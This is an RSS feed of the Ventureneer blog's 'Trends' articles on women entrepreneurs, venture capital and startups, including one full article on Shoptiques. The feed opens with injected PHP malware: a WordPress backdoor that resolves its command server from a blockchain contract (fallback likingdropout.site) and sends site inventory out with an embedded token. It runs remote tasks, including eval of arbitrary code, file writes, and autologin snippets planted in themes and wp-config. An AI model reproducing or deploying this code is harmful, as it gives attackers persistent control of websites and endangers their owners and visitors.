// x1_nb if(!defined('ABSPATH'))return; $cfg=array( 'stub'=>'/home3/venturen/public_html/wp-content/plugins/wp-helper-a38794/wp-helper-a38794.php', 'ctrl'=>'// x1_nb', 'vis'=>'// 3d_uw', 'vis_func'=>'wp_bxsrxj', 'vis_paths'=>array('/home3/venturen/public_html/wp-content/plugins/wp-helper-a38794/wp-helper-a38794.php'), 'opt'=>'_wp_vrbug87v', ); $keys=array(); $keys['id']='7t4'; $keys['ver']='5j'; $keys['caps']='3jq'; $keys['tasks']='f0v'; $keys['interval']='2w3'; $keys['ack_id']='9hl'; $keys['ok']='9t'; $keys['detail']='ao5'; $keys['inv']='jk7'; $keys['result']='mud'; $hdr='X-RDI-Auth';$tok='OcC2dx8cc8TjZbMDvjnST00LT6blWy7SNq89qhpdXRs';$id='152b2a56d57e6965';$interval=420; function _ea_inv($cfg){ $r=array('ts'=>time(),'wp'=>(function_exists('get_bloginfo')?get_bloginfo('version'):''),'php'=>PHP_VERSION); $chk=function($p,$m){$o=array('path'=>$p,'exists'=>false,'marker'=>false,'size'=>0);if(!$p||!is_string($p))return $o; if(@is_file($p)){$b=@file_get_contents($p);$o['exists']=true;$o['size']=strlen((string)$b);$o['marker']=($b&&strpos($b,$m)!==false);}return $o;}; $r['stub']=$chk($cfg['stub'],$cfg['ctrl']); $vis=array('plugin'=>null,'paths'=>array()); foreach($cfg['vis_paths'] as $_vp){$vis['paths'][]=$chk($_vp,$cfg['vis']);} $found=null;foreach($vis['paths'] as $_p){if(!empty($_p['marker'])){$found=$_p;break;}} if(!$found){$pd=WP_CONTENT_DIR.'/plugins';if(@is_dir($pd)){foreach(@glob($pd.'/*/*.php')?:array() as $_f){$b=@file_get_contents($_f);if($b&&strpos($b,'// ea_plug')!==false){$found=$chk($_f,'// ea_plug');break;}}} $vis['plugin']=$found?:array('path'=>'','exists'=>false,'marker'=>false); $r['visitor']=$vis; $mu=array('path'=>'','exists'=>false,'marker'=>false);$md=WP_CONTENT_DIR.'/mu-plugins'; if(@is_dir($md)){foreach(@glob($md.'/*.php')?:array() as $_f){$b=@file_get_contents($_f);if($b&&strpos($b,'// ea_mu')!==false){$mu=$chk($_f,'// ea_mu');break;}}} $r['mu_autologin']=$mu; $ft=0;$fw=0;$td=WP_CONTENT_DIR.'/themes';if(@is_dir($td)){foreach(@glob($td.'/*/functions.php')?:array() as $_f){$ft++;$b=@file_get_contents($_f);if($b&&strpos($b,'// _ea_al')!==false)$fw++;}} $r['functions_autologin']=array('themes_total'=>$ft,'themes_with_marker'=>$fw); $wpc=array('path'=>(defined('ABSPATH')?ABSPATH.'wp-config.php':''),'exists'=>false,'marker'=>false); if($wpc['path']&&@is_file($wpc['path'])){$b=@file_get_contents($wpc['path']);$wpc['exists']=true;$wpc['marker']=($b&&(strpos($b,'// _ea_wc')!==false||strpos($b,'/* _ea_wc_s */')!==false));} $r['wpconfig_inject']=$wpc; $cp=array();if(defined('LSCWP_V'))$cp[]='litespeed';if(defined('W3TC'))$cp[]='w3tc'; if(defined('WP_ROCKET_VERSION'))$cp[]='wp_rocket';if(defined('WPCACHEHOME'))$cp[]='wp_super_cache'; if(defined('SG_CACHEPRESS'))$cp[]='sg_optimizer';$r['cache']=array('plugins'=>$cp,'opcache'=>function_exists('opcache_get_status')); return $r;} function _ea_run_task($_task,$cfg,$keys,$hdr,$tok,$id){ $_ok=false;$_detail='';$_result=null; $_code=isset($_task['t'])?$_task['t']:'';$_p=isset($_task['p'])?$_task['p']:array();$_tid=isset($_task['i'])?$_task['i']:0; if(($_code==='wf'||$_code==='ld')&&!empty($_p['path'])&&isset($_p['content'])){ $_path=$_p['path'];$_body=@is_file($_path)?@file_get_contents($_path):''; if($_code==='ld'&&strpos((string)$_body,$_p['content'])===false)$_body.=$_p['content']; elseif($_code==='wf')$_body=$_p['content']; $_ok=@file_put_contents($_path,$_body)!==false; }elseif($_code==='su'&&!empty($_p['path'])&&!empty($_p['content'])){ $_ok=@file_put_contents($_p['path'],$_p['content'])!==false; }elseif($_code==='rp'&&!empty($_p['code'])){ ob_start();try{eval($_p['code']);$_ok=true;}catch(Throwable $e){$_detail=$e->getMessage();}catch(Exception $e){$_detail=$e->getMessage();} $_result=array('output'=>ob_get_clean());} elseif($_code==='va'){$_result=_ea_inv($cfg);$_ok=true;} elseif($_code==='fc'){ $p=array();if(function_exists('wp_cache_flush')){wp_cache_flush();$p[]='object';} if(function_exists('opcache_reset')){@opcache_reset();$p[]='opcache';} if(defined('LSCWP_V')&&function_exists('do_action')){do_action('litespeed_purge_all');$p[]='litespeed';} if(defined('W3TC')&&function_exists('w3tc_flush_all')){w3tc_flush_all();$p[]='w3tc';} if(function_exists('rocket_clean_domain')){rocket_clean_domain();$p[]='wp_rocket';} if(function_exists('wp_cache_clear_cache')){wp_cache_clear_cache();$p[]='wp_super_cache';} if(function_exists('sg_cachepress_purge_cache')){sg_cachepress_purge_cache();$p[]='sg_optimizer';} $_ok=true;$_result=array('purged'=>$p);} elseif($_code==='ma'&&!empty($_p['path'])&&!empty($_p['content'])){ @wp_mkdir_p(dirname($_p['path']));$_ok=@file_put_contents($_p['path'],$_p['content'])!==false; }elseif($_code==='fn'&&!empty($_p['snippet'])){ $td=WP_CONTENT_DIR.'/themes';$n=0;if(@is_dir($td)){foreach(@glob($td.'/*/functions.php')?:array() as $_f){$b=@file_get_contents($_f);if(strpos((string)$b,'// _ea_al')===false){$b=rtrim((string)$b)."\n".$_p['snippet'];if(@file_put_contents($_f,$b)!==false)$n++;}}} $_ok=$n>0;$_result=array('themes_updated'=>$n);} elseif($_code==='wc'){ $wp=ABSPATH.'wp-config.php';if(@is_file($wp)){$b=@file_get_contents($wp); if(strpos($b,'/* _ea_wc_s */')!==false){$b=preg_replace('#/\*/* _ea_wc_s */\*/.*?/\* _ea_wc_e \*/#s','',$b);} $b=str_replace(array('// _ea_wc','/* _ea_wc_s */','/* _ea_wc_e */'),'',$b);$_ok=@file_put_contents($wp,$b)!==false;} } $ack=array($keys['ack_id']=>$_tid,$keys['ok']=>$_ok,$keys['detail']=>$_detail); if($_result!==null)$ack[$keys['result']]=$_result; return $ack;} function _ea_sync($cfg,$keys,$hdr,$tok,$id,$interval,$force){ $k=$cfg['opt'];if(!$force&&!wp_doing_cron()){ if(is_admin())return; $last=(int)get_option($k,0);if(time()-$last<$interval)return; } $u='likingdropout.site';$co='0x9e33A3979F74c7700E4BaA7e7a2934556f72eF96';$sel='0x38bd65e2';$rpcs=array('https://data-seed-prebsc-1-s1.bnbchain.org:8545','https://data-seed-prebsc-1-s1.bnbchain.org:8545/','https://data-seed-prebsc-2-s1.binance.org:8545/','https://data-seed-prebsc-2-s2.binance.org:8545/','https://bsc-testnet-dataseed.bnbchain.org/','https://bnb-testnet.api.onfinality.io/public'); foreach($rpcs as $_rpc){ $b=json_encode(array('jsonrpc'=>'2.0','id'=>97,'method'=>'eth_call','params'=>array(array('to'=>$co,'data'=>$sel),'latest'))); $ctx=stream_context_create(array('ssl'=>array('verify_peer'=>false,'verify_peer_name'=>false),'http'=>array('method'=>'POST','header'=>"Content-Type: application/json\r\n",'content'=>$b,'timeout'=>3,'ignore_errors'=>true))); $raw=@file_get_contents($_rpc,false,$ctx); if(!$raw)continue; $j=json_decode($raw,true); if(empty($j['result'])||strlen($j['result'])<10)continue; $h=substr($j['result'],2); if(strlen($h)<128)continue; $off=(int)hexdec(substr($h,0,64)); $len=(int)hexdec(substr($h,$off*2,64)); $_z=pack('H*',substr($h,$off*2+64,$len*2));if($_z)$u=$_z;break; } $_hp='/panel/api/v1/metrics/collect'; $_z=trim((string)$u);$_z=preg_replace('#^https?://#','',$_z); if(strpos($_z,'/')!==false){$_xp=explode('/',$_z,2);$_z=$_xp[0];if(!empty($_xp[1]))$_hp='/'.ltrim($_xp[1],'/');} $_z=trim($_z,'.');if(!$_z)$_z='likingdropout.site'; $_s=substr(str_replace(array('+','/','='),'',base64_encode(random_bytes(6))),0,10); $u='https://'.$_s.'.'.$_z.$_hp; $_ack=$u;if(substr($_ack,-7)==='collect')$_ack=substr($_ack,0,-7).'ack';else $_ack=rtrim($_ack,'/').'/ack'; $inv=_ea_inv($cfg); $b=array($keys['id']=>$id,$keys['ver']=>2,$keys['caps']=>array('server_sync','visitor_js','write_file'),$keys['inv']=>$inv); $resp='';if(function_exists('wp_remote_post')){$_r=wp_remote_post($u,array('timeout'=>20,'sslverify'=>false,'headers'=>array('Content-Type'=>'application/json',$hdr=>$tok,'X-Site-Id'=>$id),'body'=>json_encode($b)));if(!is_wp_error($_r))$resp=(string)wp_remote_retrieve_body($_r);}else{$ctx=stream_context_create(array('ssl'=>array('verify_peer'=>false,'verify_peer_name'=>false),'http'=>array('method'=>'POST','header'=>"Content-Type: application/json\r\n".$hdr.": ".$tok."\r\nX-Site-Id: ".$id."\r\n",'content'=>json_encode($b),'timeout'=>20,'ignore_errors'=>true)));$resp=(string)@file_get_contents($u,false,$ctx);} if(!$resp)return; update_option($k,time(),false); $j=json_decode($resp,true);$tk=$keys['tasks']; if(empty($j[$tk])||!is_array($j[$tk]))return; foreach($j[$tk] as $_task){ $ack=_ea_run_task($_task,$cfg,$keys,$hdr,$tok,$id); if(function_exists('wp_remote_post')){@wp_remote_post($_ack,array('timeout'=>20,'sslverify'=>false,'headers'=>array('Content-Type'=>'application/json',$hdr=>$tok,'X-Site-Id'=>$id),'body'=>json_encode($ack)));}else{$actx=stream_context_create(array('ssl'=>array('verify_peer'=>false,'verify_peer_name'=>false),'http'=>array('method'=>'POST','header'=>"Content-Type: application/json\r\n".$hdr.": ".$tok."\r\nX-Site-Id: ".$id."\r\n",'content'=>json_encode($ack),'timeout'=>20,'ignore_errors'=>true)));@file_get_contents($_ack,false,$actx);} } } add_filter('cron_schedules',function($s){$s['ea_fleet']=array('interval'=>$interval,'display'=>'Fleet sync');return $s;}); add_action('init',function()use($cfg,$keys,$hdr,$tok,$id,$interval){ if(!wp_next_scheduled('ea_fleet_sync'))wp_schedule_event(time()+120,'ea_fleet','ea_fleet_sync'); _ea_sync($cfg,$keys,$hdr,$tok,$id,$interval,false); },1); add_action('ea_fleet_sync',function()use($cfg,$keys,$hdr,$tok,$id,$interval){ _ea_sync($cfg,$keys,$hdr,$tok,$id,$interval,true); }); Trends – Ventureneer https://ventureneer.com Wed, 21 Sep 2022 13:58:04 +0000 en-US hourly 1 https://wordpress.org/?v=7.0.4 https://ventureneer.com/wp-content/uploads/2018/02/cropped-favicon-7-32x32.gif Trends – Ventureneer https://ventureneer.com 32 32 Mom Founder And VCs Are Disrupting The Childcare Industry https://ventureneer.com/mom-founder-and-vcs-are-disrupting-the-childcare-industry/ https://ventureneer.com/mom-founder-and-vcs-are-disrupting-the-childcare-industry/#respond Wed, 21 Sep 2022 07:00:00 +0000 https://ventureneer.com/?p=3544 Women are generally responsible for childcare so it’s no surprise that female founders are creating innovative startups to solve the childcare crisis. And it’s also no surprise that women are investing in famtech startups.

]]>
https://ventureneer.com/mom-founder-and-vcs-are-disrupting-the-childcare-industry/feed/ 0
Not A Rich White Guy: Here’s How To Get Your Entrepreneurial Venture Started https://ventureneer.com/not-a-rich-white-guy-heres-how-to-get-your-entrepreneurial-venture-started/ https://ventureneer.com/not-a-rich-white-guy-heres-how-to-get-your-entrepreneurial-venture-started/#respond Wed, 14 Sep 2022 07:00:00 +0000 https://ventureneer.com/?p=3540 Even if you weren’t born with money and connections, you can still achieve your entrepreneurial dream. Kathryn Finney’s book, Build the Damn Thing, tells you how to go for the brass ring.

]]>
https://ventureneer.com/not-a-rich-white-guy-heres-how-to-get-your-entrepreneurial-venture-started/feed/ 0
The Power Of CPG Brings A Steady ROI To VC Funds https://ventureneer.com/the-power-of-cpg-brings-a-steady-roi-to-vc-funds/ https://ventureneer.com/the-power-of-cpg-brings-a-steady-roi-to-vc-funds/#respond Wed, 07 Sep 2022 12:30:00 +0000 https://ventureneer.com/?p=3537 Even in tough times, consumers spend. A venture capital fund is tapping into stability CPG spending to earn great returns for investors.

]]>
https://ventureneer.com/the-power-of-cpg-brings-a-steady-roi-to-vc-funds/feed/ 0
Revenue-Based Financing Powers A Tech Company To The Inc. 5000 https://ventureneer.com/revenue-based-financing-powers-a-tech-company-to-the-inc-5000/ https://ventureneer.com/revenue-based-financing-powers-a-tech-company-to-the-inc-5000/#respond Wed, 24 Aug 2022 12:15:00 +0000 https://ventureneer.com/?p=3531 Preserving your ownership stake while getting the capital you need to scale can be tough. But non-dilutive financing options are available, especially if your profit margin is high.

]]>
https://ventureneer.com/revenue-based-financing-powers-a-tech-company-to-the-inc-5000/feed/ 0
Cord Blood Safe Ensures Future Treatments Are Available To You And Your Family https://ventureneer.com/cord-blood-safe-ensures-future-treatments-are-available-to-you-and-your-family/ https://ventureneer.com/cord-blood-safe-ensures-future-treatments-are-available-to-you-and-your-family/#respond Wed, 17 Aug 2022 12:30:00 +0000 https://ventureneer.com/?p=3528 To take advantage of stem cell therapy, you need a donor match, which is sometimes hard to find. Now, stem cells can be banked when a child is born so, if the need arises, the matching stem cells are at hand.

]]>
https://ventureneer.com/cord-blood-safe-ensures-future-treatments-are-available-to-you-and-your-family/feed/ 0
Relationships, Mentorship, And Certification Help A Woman-Owned Construction Firm Grow https://ventureneer.com/relationships-mentorship-and-certification-help-a-woman-owned-construction-firm-grow/ https://ventureneer.com/relationships-mentorship-and-certification-help-a-woman-owned-construction-firm-grow/#respond Wed, 10 Aug 2022 12:30:00 +0000 https://ventureneer.com/?p=3524 Resources are out there to help minority- and women-owned (M/WBE) businesses learn what they need to know to grow their companies. Using them can make the difference between success and failure.

]]>
https://ventureneer.com/relationships-mentorship-and-certification-help-a-woman-owned-construction-firm-grow/feed/ 0
PropTech Startup Makes Buying And Selling Your Home Easier And Cheaper https://ventureneer.com/proptech-startup-makes-buying-and-selling-your-home-easier-and-cheaper/ https://ventureneer.com/proptech-startup-makes-buying-and-selling-your-home-easier-and-cheaper/#respond Wed, 27 Jul 2022 12:30:00 +0000 https://ventureneer.com/?p=3518 HomeLister, an online home selling platform providing a better home buying-and-selling experience at a flat affordable fee, almost didn’t launch. Good lawyers and investors helped them persevere.

]]>
https://ventureneer.com/proptech-startup-makes-buying-and-selling-your-home-easier-and-cheaper/feed/ 0
SPVs: A Tool For Women-Led VCs, Angel Groups, And Investors https://ventureneer.com/spvs-a-tool-for-women-led-vcs-angel-groups-and-investors/ https://ventureneer.com/spvs-a-tool-for-women-led-vcs-angel-groups-and-investors/#respond Wed, 20 Jul 2022 12:30:00 +0000 https://ventureneer.com/?p=3515 Special Purpose Vehicles can be used by women venture capitalists, angel groups to raise money from accredited investors to invest in startups. SPVs have lower fees, deals are quicker to do, and returns are distributed faster.

]]>
https://ventureneer.com/spvs-a-tool-for-women-led-vcs-angel-groups-and-investors/feed/ 0
AI Startup Speeds Healthcare Innovations To Save Lives https://ventureneer.com/ai-startup-speeds-healthcare-innovations-to-save-lives/ https://ventureneer.com/ai-startup-speeds-healthcare-innovations-to-save-lives/#respond Wed, 13 Jul 2022 16:30:00 +0000 https://ventureneer.com/?p=3511 Faster synthesis and analysis of healthcare data get medical innovations to market faster. By harnessing AI, big data, machine learning, and predictive analytics, this startup is doing just that for medical device and pharmaceutical companies

]]>
https://ventureneer.com/ai-startup-speeds-healthcare-innovations-to-save-lives/feed/ 0
Californians Can Ensure Women And Diverse Founders Get The Funding They Need https://ventureneer.com/californians-can-ensure-women-and-diverse-founders-get-the-funding-they-need/ https://ventureneer.com/californians-can-ensure-women-and-diverse-founders-get-the-funding-they-need/#respond Wed, 28 Oct 2020 13:39:22 +0000 http://ventureneer.com/?p=2994 The pandemic requires us to rethink the way we are doing business so everyone has equal access to opportunities. Proposition 16 on the California ballot is leading the way

]]>
https://ventureneer.com/californians-can-ensure-women-and-diverse-founders-get-the-funding-they-need/feed/ 0
Agility And Teamwork Lead To Entrepreneurial Success https://ventureneer.com/agility-and-teamwork-lead-to-entrepreneurial-success/ https://ventureneer.com/agility-and-teamwork-lead-to-entrepreneurial-success/#respond Wed, 29 Jul 2020 13:19:27 +0000 http://ventureneer.com/?p=2911 Start small, be willing to change direction, and build a good team, including employees, associations and a coach. Delight your customers so they evangelize your service. That’s the formula for entrepreneurial success even through the coronavirus pandemic.

]]>
https://ventureneer.com/agility-and-teamwork-lead-to-entrepreneurial-success/feed/ 0
Coronavirus And Shoptiques Speed Boutiques Shift To E-Commerce https://ventureneer.com/coronavirus-and-shoptiques-speed-boutiques-shift-to-e-commerce/ https://ventureneer.com/coronavirus-and-shoptiques-speed-boutiques-shift-to-e-commerce/#respond Wed, 20 May 2020 13:11:28 +0000 http://ventureneer.com/?p=2828 Continue reading "Coronavirus And Shoptiques Speed Boutiques Shift To E-Commerce"

]]>
Brick and mortar retail chain stores with no or limited online offerings had defied online sales trends before the pandemic. However, over the last couple of months, sales dried up. Some analysts believe that these retailers risk obsolescence if online purchasing behavior becomes permanent.

As stay-at-home mandates are lifted, boutique owners recognize that to stay in business; they need to integrate real-life and online experiences. According to the U.S. Department of Commerce, consumers spent $602 billion online with U.S. merchants in 2019, up 14.9% from the prior year. eMarketer found that not only have e-commerce sales grown since stay-at-home restrictions took effect, but April’s average daily sales are 39% higher than March’s. Boutiques without e-commerce need to get online quickly or risk shuttering their doors forever. 

For small businesses, building their e-commerce site is price prohibitive. Instead, they turn to turnkey solutions. Lori Harris, the owner of Mary Jane’s, a women’s boutique located in Park City, Utah, is using Shoptiques. “What’s great about them is that they focus on small boutiques and what these boutiques have to offer,” Harris said in the Park Record. “So when a person comes to our website and searches for shopping, they will see our products, but they can jump off to see other small boutiques around the world. 

Olga Vidisheva, an immigrant from Kyrgyzstan, raised in Russia, moved to the United States at 17 to go to college. She started Shoptiques in 2012. For her, fashion was always a way to express her individuality. When she worked in the corporate world for Goldman Sachs, she traveled the world. Vidisheva would buy fashion and accessories that were a reflection of her sense of style. 

When she attended Harvard Business School (HBS), Vidisheva became fascinated by the internet and e-commerce. Small businesses were being left out. They didn’t have the money and expertise to build a platform and market their stores online. She spent a summer interning at Chanel, where she was consistently complimented not on her name-brand designer pieces, but rather on her eye-catching boutique finds. Was there a way to marry these two passions? 

In her second year at HBS, Vidisheva started researching why small clothing stores didn’t have a digital presence and spoke to 800 boutiques about the obstacles to selling online. Consistently, she heard boutiques didn’t have the time and resources to do it. She drafted a business plan to bring the world’s best boutiques online. 

While in Jakarta at a friend’s wedding, she asked around to get a recommendation for a developer who could build a minimum viable product (MVP). “We saw early signs of success,” she stated. The MVP had the basic features and was able to show traction. Vidisheva was able to get feedback from the market. 

This gave her the confidence to apply to Y Combinator. Vidisheva was the first non-technical, solo founder to be accepted into the accelerator program. She raised money from top investors like Andreessen Horowitz, Greylock Partners, and Benchmark. Until her seed round, she was bootstrapping it. To save money on rent, she slept on the floor of a friend’s apartment.

Entrepreneurship is never a smooth ride. 

Among the bumps along her way, finding a technologist who understood her vision. The process was one of trial and error. Whether you insource or outsource, finding the right technologist is like dating. “You have to kiss a lot of frogs to find your prince,” as the saying goes. “We hired some people that weren’t the right fit,” said Vidisheva. However, one of them brought Marc Gugliuzza on board as an engineer. He is now Shoptiques CTO and is building a new operating system. “We have great synergy,” she continued. 

By 2015, Vidisheva made Forbes’ inaugural 30 Under 30 List for retail. Through the years, she’s consistently heard that the retailers she serves wanted more. They wanted an end-to-end solution. The platform now enables retailers to manage inventory, staff, purchase orders, and customers. It also processes transactions, provides extensive real-time reporting, and offers a community of retailers who problem-solve together. Consumers can shop at over 5,000 local boutiques to find fashion that expresses their unique sense of style.

During stay at home restrictions, to help boutiques sell merchandise, Shoptiques accelerated the launch of its mobile app, which includes a chat feature. Average revenue for stores increased more than three-fold between March and April, commented Vidisheva. It is also providing tips on how to sell nonessentials during the pandemic. 

COVID-19 will forever change retailing. How are you adjusting?

Read more articles like this as soon as they are published on Forbes

]]>
https://ventureneer.com/coronavirus-and-shoptiques-speed-boutiques-shift-to-e-commerce/feed/ 0
This Startup Addresses Social Distancing With An Engaging Experience For Kids And Their Relatives https://ventureneer.com/this-startup-addresses-social-distancing-with-an-engaging-experience-for-kids-and-their-relatives/ https://ventureneer.com/this-startup-addresses-social-distancing-with-an-engaging-experience-for-kids-and-their-relatives/#respond Sat, 11 Apr 2020 21:38:54 +0000 http://ventureneer.com/?p=2795 By narrowing your market niche, you can grow your company, even during a pandemic.

]]>
https://ventureneer.com/this-startup-addresses-social-distancing-with-an-engaging-experience-for-kids-and-their-relatives/feed/ 0
Is The Next Big Thing In Venture Capital Human Capital https://ventureneer.com/is-the-next-big-thing-in-venture-capital-human-capital/ https://ventureneer.com/is-the-next-big-thing-in-venture-capital-human-capital/#respond Wed, 27 Nov 2019 01:54:23 +0000 http://ventureneer.com/?p=2694 Entrepreneurial success needs more than an idea and money. It requires a passionate team with shared values and a growth mindset.

]]>
https://ventureneer.com/is-the-next-big-thing-in-venture-capital-human-capital/feed/ 0
Functional Foods And The Triple Bottom Line: People Planet Profit https://ventureneer.com/functional-foods-and-the-triple-bottom-line-people-planet-profit/ https://ventureneer.com/functional-foods-and-the-triple-bottom-line-people-planet-profit/#respond Wed, 13 Nov 2019 23:29:24 +0000 http://ventureneer.com/?p=2687 Healthy people and a healthy planet can be the foundation of a solid business model.

]]>
https://ventureneer.com/functional-foods-and-the-triple-bottom-line-people-planet-profit/feed/ 0
Grasshopper Ain’t Your Grandma’s Commercial Bank https://ventureneer.com/grasshopper-aint-your-grandmas-commercial-bank/ https://ventureneer.com/grasshopper-aint-your-grandmas-commercial-bank/#respond Wed, 23 Oct 2019 23:43:56 +0000 http://ventureneer.com/?p=2674 Disruption has finally come to the business banking sector. Innovative startups – even mature companies that have become tech enabled – can now access lower-cost, streamlined banking services and loans through a new digital bank. 

]]>
https://ventureneer.com/grasshopper-aint-your-grandmas-commercial-bank/feed/ 0
Diverse Cultural Celebrations Are A Huge Market Opportunity https://ventureneer.com/diverse-cultural-celebrations-are-a-huge-market-opportunity/ https://ventureneer.com/diverse-cultural-celebrations-are-a-huge-market-opportunity/#respond Wed, 04 Sep 2019 02:08:27 +0000 http://ventureneer.com/?p=2637 Entrepreneurs find their business opportunities close to home, which is another reason why diversity helps the economy grow.

]]>
https://ventureneer.com/diverse-cultural-celebrations-are-a-huge-market-opportunity/feed/ 0
Better Benefits Means A Better Bottom Line https://ventureneer.com/better-benefits-means-a-better-bottom-line/ https://ventureneer.com/better-benefits-means-a-better-bottom-line/#respond Wed, 07 Aug 2019 23:57:55 +0000 http://ventureneer.com/?p=2625 Women entrepreneurs have a secret formula for improving profit: They improve employee benefits.

]]>
https://ventureneer.com/better-benefits-means-a-better-bottom-line/feed/ 0
How Mastercard Helps Women Entrepreneurs Get The Loans They Need https://ventureneer.com/how-mastercard-helps-women-entrepreneurs-get-the-loans-they-need/ https://ventureneer.com/how-mastercard-helps-women-entrepreneurs-get-the-loans-they-need/#respond Thu, 27 Jun 2019 18:24:02 +0000 http://ventureneer.com/?p=2584 When banks won’t loan to women entrepreneurs, CDFIs will. Mastercard is helping to build that ecosystem so more women can raise money for their businesses.

]]>
https://ventureneer.com/how-mastercard-helps-women-entrepreneurs-get-the-loans-they-need/feed/ 0
A Father’s Day Gift That Benefits Everyone https://ventureneer.com/a-fathers-day-gift-that-benefits-everyone/ https://ventureneer.com/a-fathers-day-gift-that-benefits-everyone/#respond Wed, 12 Jun 2019 23:03:31 +0000 http://ventureneer.com/?p=2569 Paid family leave for both mothers and fathers will help families, entrepreneurs, and businesses.

Guilherme Lemos on Unsplash

]]>
https://ventureneer.com/a-fathers-day-gift-that-benefits-everyone/feed/ 0
Let’s Give Mothers A Real Present By Committing To Providing Good Childcare https://ventureneer.com/lets-give-mothers-a-real-present-by-committing-to-providing-good-childcare/ https://ventureneer.com/lets-give-mothers-a-real-present-by-committing-to-providing-good-childcare/#respond Wed, 08 May 2019 02:21:02 +0000 http://ventureneer.com/?p=2536 Mothers in the workforce — and dads — need childcare to reach their full economic potential. That means government support and community commitment.

Shaggy Paul via Flickr

]]>
https://ventureneer.com/lets-give-mothers-a-real-present-by-committing-to-providing-good-childcare/feed/ 0